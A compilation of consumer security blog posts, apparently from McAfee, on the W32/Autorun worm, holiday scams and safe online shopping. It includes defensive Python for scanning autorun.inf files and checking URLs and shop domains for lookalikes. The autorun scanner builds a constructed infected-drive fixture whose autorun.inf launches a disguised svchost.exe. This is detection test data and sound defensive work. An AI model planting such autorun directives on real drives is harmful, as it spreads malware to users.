    Even if AutoRun is disabled, W32/Autorun still relies on you to run it. It drops copies of itself on infected flash drives and network shares disguised as folders or files with enticing names like “porn” and “sexy”, often hiding the real folder and giving the executable a folder icon so that it looks like the folder it replaced. Double-clicking the imposter runs the worm and infects your computer.

    The worm can also change your computer’s settings to allow it to run every time you boot up. Some variants even disable Windows updates to prevent the system from downloading security patches and ensure the worm can do its job of infecting every device your computer comes into contact with, opening the door for any virus a hacker wants to install at your expense.
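    The two tricks above leave recognizable traces on the drive itself, and a removable-media scan can look for them. What follows is an added example written for this page, not code from McAfee or from any product: it parses autorun.inf for directives that launch a program, and flags executables that impersonate a folder or hide behind a double extension. The sample drive layout it builds (the file names and the RECYCLER path) is constructed for the demonstration.

```python
import os
import tempfile

# File types Windows runs on double-click; a worm drops its payload as one of these.
EXEC_EXTENSIONS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".vbs", ".js"}
# autorun.inf directives that launch a program or redirect the drive's default action.
RISKY_KEYS = {"open", "shellexecute", "shell"}


def parse_autorun_inf(text):
    """Return (key, value) pairs from the [autorun] section that cause code to run.

    Hand-rolled rather than configparser because worm-written .inf files often
    contain junk lines and odd casing that a strict INI parser rejects.
    """
    findings = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        # shell\<verb>\command=... sets what a context-menu verb (Open, Explore) runs.
        if key in RISKY_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            findings.append((key, value.strip()))
    return findings


def scan_drive_root(root):
    """Inspect the top level of a drive as a removable-media scan would; returns (rule, detail) pairs."""
    findings = []
    inf_path = os.path.join(root, "autorun.inf")
    if os.path.isfile(inf_path):
        with open(inf_path, encoding="utf-8", errors="replace") as f:
            for key, value in parse_autorun_inf(f.read()):
                findings.append(("autorun_directive", f"{key}={value}"))
    names = os.listdir(root)
    folder_names = {n.lower() for n in names if os.path.isdir(os.path.join(root, n))}
    for name in names:
        stem, ext = os.path.splitext(name)
        if ext.lower() not in EXEC_EXTENSIONS:
            continue
        if stem.lower() in folder_names:
            # "Photos.exe" beside a (usually hidden) "Photos" folder: the fake-folder lure.
            findings.append(("folder_impersonation", name))
        elif "." in stem:
            # "sexy.jpg.scr": the real extension vanishes when Explorer hides known extensions.
            findings.append(("double_extension", name))
    return findings


def build_sample_drive():
    """Create a throwaway directory laid out like an infected USB stick (constructed sample data)."""
    root = tempfile.mkdtemp(prefix="usb_")
    with open(os.path.join(root, "autorun.inf"), "w") as f:
        f.write("[AutoRun]\n"
                "open=RECYCLER\\S-1-5-21\\svchost.exe\n"
                "shell\\open\\command=RECYCLER\\S-1-5-21\\svchost.exe\n"
                "icon=%SystemRoot%\\system32\\shell32.dll,4\n")
    os.mkdir(os.path.join(root, "Photos"))
    for name in ("Photos.exe", "sexy.jpg.scr", "readme.txt"):
        open(os.path.join(root, name), "wb").close()
    return root


if __name__ == "__main__":
    for rule, detail in scan_drive_root(build_sample_drive()):
        print(f"{rule:22} {detail}")
```

    The icon= and label= lines are ignored on purpose: they are what a legitimate autorun.inf on a software CD contains. What marks the worm’s file is a directive that names something to execute, and on the sample drive the scan reports two of those plus the two disguised executables, while leaving readme.txt alone.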

    Symptoms of a W32/Autorun worm infection

    A W32/Autorun worm infection works quietly in the background, spreading to connected devices and weakening your system’s defenses without triggering immediate alarms. However, there are subtle signs that indicate the infection. Recognizing these early symptoms can help you take action to block the worm’s activities before it causes irreparable damage to your device and network:

    • Slow performance: Your computer or internet connection may slow down due to the high processing usage that the worm requires as it actively searches for drives to infect.
    • Presence of unfamiliar files/folders: The worm creates copies of itself and configuration files on infected drives, sometimes disguised with random names or enticing names such as “porn” or “sexy”.
    • System instability: Your computer may begin freezing, crashing, or restarting unexpectedly as the worm runs multiple background processes while consuming system resources and interfering with normal operating functions.
    • Modified settings: You might notice unexpected changes to your desktop, folder views, or system preferences without your input. These modifications are often made to hide malicious files or make it easier for the worm to run automatically.
    • Loss of access to some features: Tools like Task Manager, Registry Editor, or Folder Options may suddenly become inaccessible. The worm disables these features to prevent you from stopping its processes or removing it manually.
    • Disabled antivirus software or Windows updates: Your security software may stop working properly, or Windows updates may be turned off without explanation. This enables the worm to block security patches and scans that could remove it.
    • Unusual network activity: You may notice unexplained internet traffic even when you’re not actively using your device. The worm could be contacting remote servers to report successful infections or download additional malicious components.
    • Diminished storage space: Available disk space may shrink rapidly with no clear reason. This happens because the worm repeatedly copies itself across your system and connected drives.

    Consequences of the W32/Autorun worm

    The impact of the W32/Autorun worm can vary depending on the specific variant, ranging from minor annoyances to severe system compromise:

    • System damage and further infection: The W32/Autorun worm acts as an entry point for attackers to silently install more dangerous malware, including data-stealing Trojans or destructive viruses.
    • Data loss and corruption: Some variants can delete important files or corrupt stored data, making documents, photos, or applications unusable or permanently unreadable, even after the worm is removed.
    • Disruption of operations: Because the worm consumes large amounts of processing power and memory in the background, it can slow down your device’s performance and stall programs to make daily computing tasks difficult.
    • Unauthorized access and information theft: Certain W32/Autorun variants are capable of monitoring your online activity, including logging keystrokes, capturing login credentials, and stealing financial details or personal data.
    • Aesthetic changes: Less destructive versions of the worm may focus on annoying changes such as altered desktop backgrounds, browser settings, or system appearance.

    How to Prevent a W32/Autorun Infection

    Preventing a W32/Autorun infection is largely about closing the simple security gaps the worm relies on to spread. By taking these steps, you can significantly reduce the chances of this worm gaining access to your computer.

    1. Disable AutoRun

    If your computer still offers to run whatever is on a CD, a flash drive, or a newly connected network location, update it as soon as possible. On any Windows version, AutoRun can also be switched off for every drive type by setting the NoDriveTypeAutoRun value to 0xFF (decimal 255) under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer (or the same path under HKEY_CURRENT_USER for a single account), or through the “Turn off Autoplay” Group Policy setting. Microsoft’s support article on disabling Autorun (KB 967715) walks through the steps for each version of Windows.

    2. Beware of shared removable devices

    Remember that this worm is highly infectious. If you share a flash drive with a friend whose computer is infected, that flash drive will carry the worm to your computer. If you do need to share a device, make sure AutoRun is disabled before you plug it in, and check that your security protection has the capability to scan new drives to prevent you from clicking on infected files.

    3. Use reliable antivirus

    While the first two tips focus on prevention, a reliable security solution will not only block a W32/Autorun infection but also remove an existing one. Solutions like McAfee+ detect the W32/Autorun worm and similar malware, which also protects you from unknowingly passing it on to friends and family.

    Final thoughts

    Autorun worms represent a persistent threat that combines old vulnerabilities with modern attack techniques. Newer security measures may have reduced their impact, but these worms continue to target systems with outdated configurations through the continued use of removable media. This is why keeping systems updated and being cautious with external devices are important habits to apply.

    In addition, you can protect yourself with proper security practices: disable AutoRun on older systems, keep your antivirus software updated, scan external devices before accessing their contents, and avoid connecting unknown USB drives to your computer.

    The post Crush that Worm before It Creeps into Your Computer appeared first on McAfee Blog.

    The Top 12 Scams Of Christmas To Watch Out For

    By: McAfee

    The holidays are just around the corner and amid the hustle and bustle, many of us will fire up our devices to go online, order gifts, plan travel, and spread cheer. But while we’re getting festive, the cybercriminals are getting ready to take advantage of the influx of your good cheer to spread scams and malware.

    With online shopping expected to grow by 7.9% year-on-year in the U.S. alone in 2025, according to Mastercard, and more people than ever using social media and mobile devices to connect, the cybercriminals have a lot of opportunities to spoil our fun. Using multiple devices provides the bad guys with more ways to access your valuable “digital assets,” such as personal information and files, especially if the devices are under-protected.

    In this guide, let’s look into the 12 most common cybercrimes and scams of Christmas, and what you can do to keep your money, information, and holiday spirit safe.

    The psychology of holiday fraud

    The festive atmosphere, continued increase in online shopping activity, and charitable spirit that define the holidays create perfect conditions for scammers to exploit your generosity and urgency.

    Not surprisingly, digital criminals become more active and more professional during this period, helped along by increasingly capable artificial intelligence. A new McAfee holiday shopping report found that 86% of consumers surveyed receive an average of 11 suspicious shopping-related messages a day across text, email and social media (roughly 3 scam texts, 5 emails, and 3 social media messages). Meanwhile, 22% admit they have been scammed during a past holiday season.

    Their scams succeed because they exploit the psychological and behavioral patterns that are rife during the holidays. The excitement and time pressure of holiday shopping often prevail over our usual caution, while the emotional aspects of gift-giving and charitable donations can be exploited and move us to be more generous. Meanwhile, scammers understand that you’re more likely to make quick purchasing decisions when the fear of missing out on limited-time offers overtakes your judgment or when you’re rushing to find the perfect gift before it’s too late.

    Overall, the frenzied seasonal themes create an environment where criminals can misuse the urgency of their fake offers and cloud our judgment, making fraudulent emails and websites appear more legitimate, while you’re already operating under the stress of holiday deadlines and budget concerns. After all, holiday promotions and charity appeals are expected during this time of year.

    Now that you understand the psychology behind the scams, it’s time to become more aware of the common scams that cybercriminals run during the holiday season.

    The 12 Scams of Christmas

    As you head online this holiday season, stay on guard and stay aware of scammers’ attempts to steal your money and your information. Familiarize yourself with the “12 Scams of Christmas” to ensure a safe and happy holiday season:

    1. Social media scams

    Many of us use social media sites to connect with family, friends, and co-workers over the holidays, and cybercriminals know this is a good place to catch you off guard because we’re all “friends,” right? Here are some of the ways criminals use these channels to get at shoppers’ gift money, identities, or other personal information:

    • Be careful when liking pages, clicking on fake alerts from friends’ accounts that have been hacked, taking advantage of raffles, ads, and deals that you get from “friends,” or installing suspicious “holiday deal” apps that give your private data away. These links can automatically download malware onto your computer that can steal personal information.
    • Ads announcing special discounts for popular gifts are especially popular, and utilize blind, shortened links, many of which could easily be malicious. Criminals are getting savvier with authentic-looking social ads and deals that direct you to fake websites. To take advantage of the deals or contests, scammers will ask you for personal information that will enable them to obtain your credit card number, email address, phone number, or home address.

    2. Malicious mobile apps

    As the popularity of smartphone apps has grown, so has the chance of downloading a malicious application that steals your information or sends premium-rate text messages without your knowledge. A telltale sign is an app that asks for more permissions than its purpose requires, such as access to your contacts or location.

    If you unwrap a new smartphone this holiday season, make sure that you only download applications from official app stores and check other users’ reviews, as well as the app’s permission policies, before downloading. Software, such as McAfee Mobile Security, can also help protect you against dangerous apps.

    3. Travel scams

    Many of us travel to visit family and friends over the holidays. We begin our journey online by looking for deals on airfare, hotels, and rental cars. Before you book, keep in mind that scammers are looking to hook you with phony travel webpages with too-fantastic deals—beautiful pictures and rock-bottom prices—to deceive you into handing over your financial details and money.

    Even when you’re already on the road, you need to be careful. Scammers who have gained access to a hotel’s Wi-Fi can push a malicious pop-up onto your screen that prompts you to install “required” software before connecting; agree, and it installs malware on your machine. Legitimate hotel networks never need you to install anything, so decline such prompts, and update your operating system and security software before you travel so that you are not tempted to accept an update on the road.

    4. Holiday spam/phishing

    You are probably already familiar with email phishing and SMiShing messages containing questionable offers and links. The scammer will mimic a legitimate organization offering cheap Rolex watches and luxury products as the “perfect gift” for that special someone, or send a message posing as your bank with a holiday promo and try to lure you into revealing information or direct you to a fake webpage. Never respond to these scams or click on an included link. Be aware that real banks won’t ask you to divulge personal information via text message. If you have any questions about your accounts, you should contact your bank directly.

    5. Quishing

    QR code phishing, or “quishing,” has emerged as a significant new threat during holiday shopping seasons. Cybercriminals place malicious QR codes in holiday advertisements posted on social media or printed flyers, on parking meters and payment kiosks at shopping centers, or on restaurant tables during holiday dining. They may also email attachments containing QR codes that claim to offer exclusive holiday deals, or stick fake shipping labels over legitimate tracking QR codes. A QR code is just a URL you cannot read at a glance, so the same caution applies as with any link: look at where it actually points before you tap.
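    Once a QR code has been decoded, or a shortened link expanded, what is left is a URL, and a few mechanical checks catch most of the lookalike domains these lures use. The following is an added example written for this page, not McAfee code, and it also applies to the “blind, shortened links” in the social media scams above. The brand list, the shortener list, the confusable-character table and the sample URLs are all constructed for the demonstration; a real tool would draw on a maintained brand list and a public-suffix database.

```python
from urllib.parse import urlsplit

# Constructed lists for the example (assumption: a real tool would use maintained data).
KNOWN_BRANDS = {"amazon", "paypal", "apple", "fedex", "walmart", "microsoft"}
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly", "rb.gy", "is.gd"}
# Character sequences that look alike in a URL bar or on a printed flyer.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def normalize(label):
    """Fold common look-alike sequences so 'arnaz0n' compares equal to 'amazon'."""
    for fake, real in CONFUSABLES:
        label = label.replace(fake, real)
    return label


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character typosquats like 'paypall'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host):
    """Crude owner-domain extraction: the last two labels (no public-suffix list, so 'co.uk' hosts need care)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def triage_url(url):
    """Return the reasons a link deserves suspicion; an empty list means nothing obvious was found."""
    reasons = []
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return ["no hostname"]
    if parts.scheme != "https":
        reasons.append("not https")
    if parts.username is not None:
        reasons.append("credentials before '@' make the real host easy to misread")
    if host.replace(".", "").isdigit():
        reasons.append("raw IP address instead of a domain name")
    if host in SHORTENERS:
        reasons.append("link shortener hides the destination; expand it before trusting it")
    if "xn--" in host:
        reasons.append("punycode (internationalized) hostname, possible homoglyph of a brand")
    labels = host.split(".")
    owner = registrable_domain(host)
    owner_label = owner.split(".")[0]
    if owner_label in KNOWN_BRANDS:
        return reasons  # the owner domain really is the brand, as far as the name goes
    subdomain_labels = set(labels[:-2])
    tokens = set(normalize(owner_label).split("-"))
    for brand in sorted(KNOWN_BRANDS):
        if brand in subdomain_labels:
            # paypal.com.secure-update.net: the brand is a subdomain of someone else's domain
            reasons.append(f"'{brand}' appears only as a subdomain of {owner}")
        elif brand in tokens or edit_distance(normalize(owner_label), brand) <= 1:
            reasons.append(f"'{owner_label}' looks like '{brand}'")
    return reasons


if __name__ == "__main__":
    for sample in ("https://www.amazon.com/deals",           # constructed sample URLs
                   "http://bit.ly/xmas",
                   "https://arnazon.com/",
                   "https://www.paypal.com.secure-update.net/login",
                   "https://amaz0n-deals.com/gift"):
        print(sample, "->", triage_url(sample) or "no obvious problem")
```

    The function only examines the string it is given, so expand a shortened link first (for instance by following its redirects from a sandboxed machine or a URL-expansion service) and hand triage_url the final destination. An empty result is not a clean bill of health; it just means the cheap checks found nothing, and the advice to verify offers with the real retailer still applies.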

    6. The new iPad, iPhone, and other hot holiday gift scams

    The kind of excitement and buzz surrounding Apple’s new iPad and iPhone is just what cybercrooks dream of when they plot their scams. They will mention must-have holiday gifts in dangerous links, phony contests, and phishing emails to grab your attention. Once they’ve caught your eye, they will again try to get you to reveal personal information or click on a dangerous link that could download malware onto your machine. Be suspicious of any deal mentioning hot holiday gift items—especially at extremely low prices—and try to verify the offer with the real retailer involved.

    7. Bogus HR and bonus emails

    Cybercriminals exploit employee expectations of year-end communications by creating fake emails that appear to come from your HR department. These messages often claim to contain annual bonus information, updated benefits packages, or mandatory holiday attendance announcements. These scams are particularly effective because they prey on legitimate employee concerns about compensation, benefits, and personal time off during the holiday season. The emails often feature real-looking company logos, proper formatting, and even references to company policies to increase their credibility. Verify any such notice through your company’s HR portal or by contacting HR through a channel you already use, rather than replying to the message or clicking its link.

    8. Bogus gift cards

    Gift cards are probably the perfect gift for some people on your holiday list. Given their popularity, cybercriminals can’t help but want to get in on the action by offering bogus gift cards online. Be wary of buying gift cards from third parties. It’s best to buy from the official retailer. Just imagine how embarrassing it would be to find out that the gift card you gave your mother-in-law was fraudulent!

    9. Phony e-tailers

    No matter what gift you’re looking for, chances are you can find it quickly and easily online, but you still want to be careful in selecting which site to shop. By promoting great deals, phony e-commerce sites will try to convince you to type in your credit card number and other personal details. After obtaining your money and information, you never receive the merchandise, and your personal information is put at risk. To prevent falling victim to bogus e-commerce stores, shop only at trusted and well-known e-commerce sites. If you’re shopping on a site for the first time, check other users’ reviews and verify that the phone number listed on the site is legitimate.

    10. Fake charities

    This is one of the biggest scams of every holiday season. As we open our hearts and wallets, the bad guys will send spam emails and pretend to be a real charity in the hope of getting in on the giving. Their emails will sport a stolen logo and copycat text, or come from an entirely invented charity. If you want to give, it’s always safer to visit the charity’s legitimate website, and do a little research about the charity before you donate.

    11. Dangerous e-cards

    E-cards are a popular way to send a quick “thank you” or holiday greeting. While most e-cards are safe, some are malicious and may contain spyware or viruses that download onto your computer once you click on the link to view the greeting. Before clicking, look for clues that the e-card is legitimate. Make sure it comes from a well-known e-card site by checking the domain name of the included link. Also check to see that the sender is someone you actually know, and that there are no misspellings or other red flags that the card is a fake.

    12. Fake shipping and delivery notices

    With increased package deliveries during the holiday season, fake shipping notifications have become a common attack. These messages claim to be from legitimate shipping companies such as UPS, FedEx, or DHL, informing you of package delivery attempts or shipping delays. To complete the delivery, these notices will ask you to click on malicious links or attachments that will download malware or direct you to fake websites that will steal personal information. The timing of these attacks coincides with legitimate increased shipping activity, making them harder to distinguish from authentic communications. To track your deliveries, it is best to check the shipping company’s real website or through the trusted platform from which you ordered the product.

    Protect yourself from scams during the holidays and year-round

    Knowing about these common scam tactics is only the first step toward protecting yourself and those you care about. The next step is for you to learn and implement practical, effective strategies to stay safe while still enjoying digital holiday shopping and giving.

    • Stay suspicious: Be wary of any offer that sounds extremely unrealistic, such as 90% discounts on luxury brands, and always learn to spot telltale signs of a fake marketing promotion such as low-resolution images, high-pressure tactics, misspellings, poor grammar, or odd links.
    • Practice safe surfing: Find out if a website is potentially dangerous before you click on it by using a safe search plug-in such as McAfee Web Protection, which blocks malware and phishing sites if you accidentally click on a malicious link, alerts you if you type a web address incorrectly and points you in the right direction, and scans your downloads and alerts you if there’s a known risk.
    • Shop mindfully: Stick to reputable e-commerce sites and platforms, and look for a trustmark that indicates that the site has been verified as safe by a reliable third party. Also, look for a lock symbol beside the HTTPS at the beginning of the web address to see if the site uses encryption to protect your data. Keep in mind that HTTPS only means your connection is encrypted; scam sites use it too, so the padlock is not proof that the site is legitimate.
    • Check before clicking: Don’t click on any links in messages from people you don’t know. If you come across a shortened URL, use a URL expander to see where the link directs to before you click.
    • Be cautious of high-pressure tactics: Legitimate businesses and charities will respectfully give you time to make purchase or donation decisions. Be suspicious of organizations that pressure you to buy or give immediately. Charities specifically should be able to provide written information about their programs and financial management.
    • Use strong passwords: Make sure your passwords are at least 12 characters long and made of randomly combined letters, numbers, and symbols. Never reuse the same password across your important accounts, and never share your passwords with anyone. A password manager makes unique, random passwords practical, and turn on two-factor authentication wherever it is offered.
    • Monitor your financial accounts actively: During peak shopping periods, review your bank and credit card statements at least once daily for charges you don’t recognize, even small ones that scammers sometimes use to test stolen card information. Set up account alerts for all transactions, low balances, and any changes to your account information.
    • Use credit instead of debit: When shopping online or in unfamiliar locations, use credit cards rather than debit cards. Credit cards typically offer better fraud protection, and fraudulent charges don’t immediately affect your bank account balance.
    • Monitor your credit reports: Check your credit reports regularly for new accounts or inquiries you didn’t authorize. Federal law entitles you to free reports from each of the three bureaus through AnnualCreditReport.com, the site the FTC points consumers to, and many services now offer free ongoing credit monitoring.
    • Consider temporary credit freezes: If you’re not planning to apply for new credit during the holidays, consider placing a temporary freeze on your credit reports to prevent scammers from opening new accounts in your name, and you can lift the freeze quickly when needed.
    • Recognize red flags: Holiday-themed phishing attempts abound during the season, making it crucial to identify and avoid suspicious communications. Closely check email addresses and phone numbers from unexpected communications, be suspicious of urgent language, watch for poor grammar and spelling, and don’t just click any link or scan any QR code.
    • Practice safe app downloads and installation: If you gift yourself with a new device this holiday season, download only well-reviewed apps developed by legitimate developers and sourced from official sources such as the Apple App Store, Google Play Store, or Microsoft Store. When installing, limit the app’s permission to only what it needs to function.
    • Keep apps updated: Regularly update your apps to ensure you have the latest security patches. Enable automatic updates when possible, and review what’s being updated periodically. Remove apps you no longer use.
    • Use a complete security solution: With the growing sophistication of scams coming in from all fronts of technology, you will need comprehensive protection with antivirus, antispyware, antispam, and a firewall. McAfee+ can help protect all of your devices—PCs, laptops, smartphones, and tablets—from AI-driven malware, phishing, spyware, and other common and emerging threats.
    • Educate yourself and your family: Keep increasing your knowledge of the latest scams and tricks cybercriminals use so you can recognize and avoid potential attacks. You can find helpful information on the McAfee Blogs and the McAfee Guides.

    Final thoughts

    The holiday season brings joy and connection, but it’s also a time when scammers work hardest to exploit your festive but rushed and distracted spirit. Effective Christmas scam prevention starts with awareness. By slowing down and taking a moment to verify before you click or buy, and using layered cybersecurity protections, you can worry about one less thing and focus on what matters most this season.

    Stay security-conscious without letting fear diminish your holiday enjoyment and pursue your digital holiday activities with the right knowledge and tools. We hope that the specific, actionable protections will help you identify red flags, verify legitimate offers, secure your devices and accounts, and respond effectively to suspicious activity. Stay informed by following trusted sources for the latest cybersecurity tips during the holidays, and make this season about celebrating safely with the people you care about most.

    Send the link to this page to your family and friends to increase their awareness and take steps to protect themselves.

    The post The Top 12 Scams Of Christmas To Watch Out For appeared first on McAfee Blog.

    Helpful Tips for Safe Online Shopping

    By: McAfee

    The holiday season seems to start earlier every year: decorations now appear in stores and online before Halloween, not after Thanksgiving.

    But one thing that hasn’t changed is that Black Friday is still a big shopping day, and online shopping has added Cyber Monday, the Monday after Thanksgiving, as another big sale day.

    Although many of us may take advantage of these great deals that the holidays offer, we also need to be aware of the risks. Online shopping is a fun and convenient way to make purchases, locate hard-to-find items, and discover bargains, but we need to take steps to protect ourselves.

    This guide looks at the methods and warning signs behind online shopping scams, shows you how to recognize fake shopping apps and websites, and shares tips for staying safe online.

    Online shopping safety amid growing e-commerce concerns

    Online shopping has become a cornerstone of American life. CapitalOne Shopping projects American online spending to reach $1.34 trillion in 2024 and exceed $2.5 trillion in 2030.

    With such a massive sum at stake, cybercriminals are laser-focused on taking a share of it, posing financial risk to the 288 million Americans who shop online. As e-commerce grows, so does fraud. E-commerce fraud was valued at $44.3 billion in 2024 and is projected to grow 141% to $107 billion by 2029.

    Be that as it may, there are many smart shopping habits you can apply to dramatically reduce your risk of becoming a victim of online shopping fraud and enjoy the convenience and benefits of online commerce.

    Common online shopping scams

    Online shopping scams are designed to look normal—at first glance—especially during busy sale seasons when we’re distracted by a million preparations, moving fast, and chasing deals. These are the very circumstances that fraudsters bank on to victimize you into taking the bait. Being aware of the common scam indicators will help you pause and think, recognize trouble early, and protect both your money and your personal information.

    • Non-delivery scams: You pay for items that never arrive, often from fake storefronts or fraudulent sellers who disappear with your money. The seller may have required you to pay by wire transfer, cryptocurrency, or gift card, methods that are irreversible and hard to trace. If you check the website, it may look new and have no customer reviews, or suspiciously have only perfect 5-star ratings. It may also offer prices that are significantly below market value.
    • Counterfeit goods scams: You receive knock-off products instead of authentic brand-name items, particularly affecting electronics, cosmetics, and luxury goods. On closer inspection, you will notice spelling errors in brand names or product descriptions, the prices seem too good to be true for premium brands, and sellers have no proof of authenticity or authorized dealer status.
    • Bait-and-switch scams: Attractive deals lure you in, but you’re pressured to buy different, more expensive items or receive products that don’t match what was advertised. This type of scam is usually characterized by items that are always “out of stock,” but offer readily available, more expensive alternatives. The seller also applies high-pressure sales tactics or limited-time offers that prevent you from comparison shopping, while the product descriptions are vague or don’t match the images shown.
    • Refund and overpayment scams: Scammers pose as buyers who “accidentally” overpay for an item you’re selling, then ask you to refund the difference before their original payment bounces. They pay with methods that can be reversed, such as checks or money orders, and may even arrange for a shipping company to collect the item before the payment clears.
    • Website and marketplace impersonations: Fake websites designed to look like legitimate popular brands can steal your payment information and personal data. Watch out for websites with slightly misspelled URLs or without HTTPS at all, as well as missing or incomplete contact information, privacy policies, or terms of service. Keep in mind that the padlock only means the connection is encrypted; fraudulent sites obtain certificates just as easily as real ones, so HTTPS by itself does not prove a site is genuine.
    • Product return fraud: Scammers exploit return policies by selling you used, damaged, or counterfeit items while making returns and refunds difficult or impossible through fake or non-existent customer service. Their return policies are overly complicated, buried in fine print, or require original packaging that wasn’t provided. They will disappear from marketplaces immediately after the return period expires.

    A guide to knowing if a shopping website is legit

    Safe online shopping starts with recognizing the hallmarks of legitimate retailers. Before you enter any payment details, take a moment to verify that the website you’re shopping on is genuine. Scam stores can look polished and convincing, but they often leave behind subtle clues. Here are quick ways to check their authenticity:

    1. Verify the website URL: By typing the URL directly into your browser rather than clicking links from emails or ads, you will avoid typosquatting scams—fake websites with URLs that look almost identical to real retailers, except for slight misspellings. Look for clear return and shipping policies. Read the fine print to understand your rights if something goes wrong.
    2. Confirm physical address and customer service: Real businesses provide multiple ways to contact them, including a physical address, phone number, and email.
    3. Evaluate pricing for realism: Be wary of prices that are too good to be true, especially for high-demand or hard-to-find items. Many legitimate retailers offer price-matching, so a genuine deal rarely needs to be far below the market.
    4. Check for verified customer reviews: Look for reviews on independent platforms like Google, Yelp, or Trustpilot rather than relying solely on testimonials on the retailer’s website. Cross-reference feedback across multiple platforms.
    5. Ensure secure payment options: Look for HTTPS in the URL and avoid sites that only accept wire transfers, gift cards, peer-to-peer payment apps, or cryptocurrency. For online purchases, check that the seller offers secure payment options with dispute protection, such as digital wallets and/or credit cards.
    6. Research domain age and registration: Use a WHOIS lookup, or its successor RDAP, to check when the domain was registered; registrant details may be hidden behind a privacy service, but the registration date is still shown. Fraudulent sites are usually newly created domains designed to disappear quickly after collecting payments. In addition, established retailers and official brand websites have invested heavily in security infrastructure, payment processing, customer protection programs, fraud prevention systems, and long-standing relationships with credit card companies that smaller or unknown sellers often lack.
    7. Check the Better Business Bureau: Search for the seller’s company on the Better Business Bureau site to see its rating, complaint history, and accreditation status, which helps you identify potential risks before making a purchase.
    8. Pay attention to browser safety warnings: Modern browsers like Chrome, Firefox, and Safari will warn you about potentially dangerous or untrustworthy sites. Google’s Safe Browsing technology blocks millions of unsafe sites daily, so don’t ignore these warnings when they appear. Some comprehensive security tools also include web protection that alerts you to dangerous links and downloads, malicious websites, and more.
    9. Verify secure checkout processes: Legitimate sites protect checkout with TLS (the successor to SSL, though the old name is still common), which you can confirm by looking for “https://” and a lock icon in your browser’s address bar. The lock confirms encryption in transit, not who operates the site, so combine it with the other checks above.
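
    Two of the checks above, the lookalike URL (step 1) and the domain age (step 6), are mechanical enough to script. The following is an added example, not code from the McAfee article: it flags a domain that imitates a short, assumed allowlist of brands (after undoing common character swaps) and parses the registration date out of an RDAP domain record, the JSON format that has replaced WHOIS. The brand list, homoglyph table, RDAP record and clock are all constructed for the example; a real tool would query the registry’s RDAP server and consult the Public Suffix List instead of keeping the last two labels.

```python
"""Vet a shop's domain before paying: flag lookalikes of known brands and very
young registrations. Brand list, homoglyph table and RDAP record are constructed
for this example."""
import json
from datetime import datetime, timezone

# Assumption: a small allowlist of retailers a shopper would type by hand.
KNOWN_BRANDS = {"amazon.com", "apple.com", "bestbuy.com", "target.com", "walmart.com"}

# Character swaps typosquatters use; applied before comparing names.
HOMOGLYPHS = {"rn": "m", "vv": "w", "0": "o", "1": "l", "3": "e", "5": "s", "7": "t"}

# Constructed RDAP (RFC 9083) answer for a domain registered a few weeks ago.
SAMPLE_RDAP = json.dumps({
    "objectClassName": "domain",
    "ldhName": "amazan-deals.com",
    "events": [
        {"eventAction": "registration", "eventDate": "2024-11-02T09:15:00Z"},
        {"eventAction": "expiration", "eventDate": "2025-11-02T09:15:00Z"},
    ],
})
NOW = datetime(2024, 11, 25, 12, 0, tzinfo=timezone.utc)  # fixed clock for the example


def registrable(url_or_host):
    """Reduce 'https://www.shop.example.com/sale' to 'example.com'.
    Keeps the last two labels only; a real tool would consult the Public Suffix List."""
    host = url_or_host.lower()
    if "://" in host:
        host = host.split("://", 1)[1]
    host = host.split("/", 1)[0]
    if host.startswith("www."):
        host = host[4:]
    return ".".join(host.split(".")[-2:])


def normalize(label):
    """Undo the swaps in HOMOGLYPHS so 'amaz0n' compares as 'amazon'."""
    for fake, real in HOMOGLYPHS.items():
        label = label.replace(fake, real)
    return label


def edit_distance(a, b):
    """Levenshtein distance (insert, delete and substitute each cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(url_or_host):
    """Return the brand this domain imitates, or None for the brand itself or an
    unrelated name. Heuristic: any hyphen-separated token of the name that equals,
    contains, or is within one edit of a brand name. It over-flags on purpose."""
    dom = registrable(url_or_host)
    if dom in KNOWN_BRANDS:
        return None
    tokens = normalize(dom.split(".")[0]).split("-")
    for brand in sorted(KNOWN_BRANDS):
        name = brand.split(".")[0]
        for tok in tokens:
            if tok == name or name in tok or edit_distance(tok, name) <= 1:
                return brand
    return None


def registration_age_days(rdap_json, now=NOW):
    """Days since the 'registration' event in an RDAP domain record, or None if absent."""
    for event in json.loads(rdap_json).get("events", []):
        if event.get("eventAction") == "registration":
            registered = datetime.fromisoformat(event["eventDate"].replace("Z", "+00:00"))
            return (now - registered).days
    return None


def vet(url_or_host, rdap_json, now=NOW, min_age_days=180):
    """Collect the red flags for a store; an empty list means nothing obvious was found."""
    findings = []
    brand = lookalike_of(url_or_host)
    if brand:
        findings.append(f"lookalike of {brand}")
    age = registration_age_days(rdap_json, now)
    if age is None:
        findings.append("no registration date in RDAP record")
    elif age < min_age_days:
        findings.append(f"registered only {age} days ago")
    return findings


if __name__ == "__main__":
    print(vet("https://www.amazan-deals.com/black-friday", SAMPLE_RDAP))
```

    The lookalike check deliberately errs toward flagging: a token one edit away from a brand is far more likely to be a typosquat than a coincidence, and a false positive costs the shopper a minute of checking rather than a card number. The age threshold of 180 days is a judgment call; the point is that a store “established since 2009” whose domain was registered last month has already lied to you once.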

    11 Tips for safe holiday shopping online

